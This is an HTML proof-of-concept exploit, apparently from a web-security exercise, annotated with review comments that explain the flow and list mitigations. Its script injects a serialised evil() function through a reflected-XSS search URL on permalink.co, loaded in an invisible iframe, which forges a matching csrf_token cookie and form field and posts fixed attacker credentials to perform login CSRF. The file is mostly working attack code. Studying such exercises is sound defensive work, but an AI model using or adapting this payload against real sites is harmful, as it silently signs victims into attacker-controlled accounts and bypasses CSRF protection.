csrf_1.html
<!--
  Review summary (defensive reading of this page).
  Flow visible below: the page builds a permalink.co /search URL whose q
  parameter carries a script element containing the source of evil(), then
  loads that URL in a zero-size iframe. evil() is never called in this
  document; it only runs if the search page echoes q back without
  HTML-escaping it (NOTE(review): assumed from how the URL is built; the
  search handler is not shown here).
  Once running in the permalink.co origin, evil() sets the csrf_token cookie
  and posts the same value as a form field. That would satisfy a check that
  only compares cookie and field (presumably what csrfdefense=1 enables;
  confirm against the server code). The effect is a login CSRF: the
  visitor's browser ends up signed in to the "attacker" account.
  Mitigations on the target side: HTML-escape reflected input on the search
  page, bind the CSRF token to the server-side session (or sign it) instead
  of trusting a cookie/field match, and serve a Content-Security-Policy that
  disallows inline script.
-->
<html>
<head>
<title></title>
<!-- jQuery is pulled from a third-party CDN with no integrity attribute; the script below uses it for $.post and $().html. -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script>
</head>
<body>
<!-- The comment below hides only the iframe opening tag; the closing tag after it sits outside the comment and has no matching open tag. -->
<!--Unneeded <iframe width="0" height="0" src="http://permalink.co" frameborder="0" name="myframe" allowfullscreen>
-->
</iframe>
<script>
// evil(): payload source. It is not invoked anywhere in this document; its text
// is serialised with toString() further down and placed in the search URL.
function evil()
{
// Sets the csrf_token cookie to the same value that is sent as a form field below.
document.cookie="csrf_token=0"
// Login POST with fixed credentials and the matching csrf_token field.
// NOTE(review): the query string names two switches (csrfdefense=1, xssdefense=0);
// their server-side meaning is not visible here.
$.post("http://permalink.co/login?csrfdefense=1&xssdefense=0", {username: "attacker", password: "l33th4x", csrf_token: "0"}
);
}
// Search URL whose q value is: an opening script tag (left unencoded), then the
// URI-encoded source of evil(), a call to it, and a closing script tag.
// The tag text is split into two string pieces so the literal closing-tag sequence
// never appears inside this inline script block, where the HTML parser would
// treat it as the end of the block.
var link = "http://permalink.co/search?q=" + "<script" + ">" + encodeURIComponent(evil.toString()+";evil();</script" + ">");
// $('<iframe>',
// {
// src: link+"",
// id: 'myframe',
// frameborder: 0,
// }); This doesn't work
// The goal was to create an iframe pointing at this link. It is built in JS because,
// per the author, putting the link directly in the HTML markup did not work.
// Replaces the entire document content with a 0x0 (invisible) iframe that loads `link`.
$("html").html("<iframe width=\"0\" height = \"0\" frameborder = \"0\" id=\"myframe\" src=\"" + link + "\"></iframe>");
// document.forms contains only form elements, and this page defines none; 'myframe'
// is the iframe's id. The lookup is therefore undefined and .submit() throws a
// TypeError. The iframe inserted above has already been added by this point.
document.forms['myframe'].submit(); // i dont think this does anything
// document.forms['myform'].submit();
</script>
</body>
</html>